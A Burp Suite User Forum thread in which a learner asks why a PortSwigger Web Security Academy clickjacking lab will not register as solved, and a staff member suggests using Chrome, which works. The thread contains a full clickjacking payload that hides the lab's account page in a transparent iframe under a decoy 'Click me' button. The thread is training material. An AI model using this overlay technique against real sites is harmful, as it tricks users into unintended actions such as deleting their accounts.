The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: Basic clickjacking with CSRF token protection not being solved

Kaustubh | Last updated: Aug 01, 2024 06:14AM UTC

I followed through the solution and the community solution. In the exploit server I am pasting this payload:

```
<style>
    iframe {
        position:relative;
        width:700px;
        height: 600px;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:500px;
        left:60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a240022042c8cab80fe308f001a0027.web-security-academy.net/my-account"></iframe>
```

I am storing it and then delivering it to the victim, but it's not being solved. I have been trying for 2 days in various labs. The "Click Me" is right above the Delete account button; in view exploit I made sure of that and then increased the opacity to 0.0001 and then stored and viewed again and delivered it to the victim, but the lab does not show solved.

Dominyque, PortSwigger Agent | Last updated: Aug 01, 2024 07:18AM UTC

Hi Kaustubh,

To confirm, are you using your normal Chrome browser (not the embedded one)?

Kaustubh | Last updated: Aug 01, 2024 07:31AM UTC

I did try once in Chrome but it just showed wrong CSRF token. Normally trying it in Firefox and the embedded one; let me try again in normal Chrome browser.

Kaustubh | Last updated: Aug 01, 2024 07:36AM UTC

OK, it got solved when tried in Chrome browser. Thanks. Typically, for all the labs, when it says use Chrome, it gets solved regardless that I am using Firefox.

Michelle, PortSwigger Agent | Last updated: Aug 01, 2024 01:00PM UTC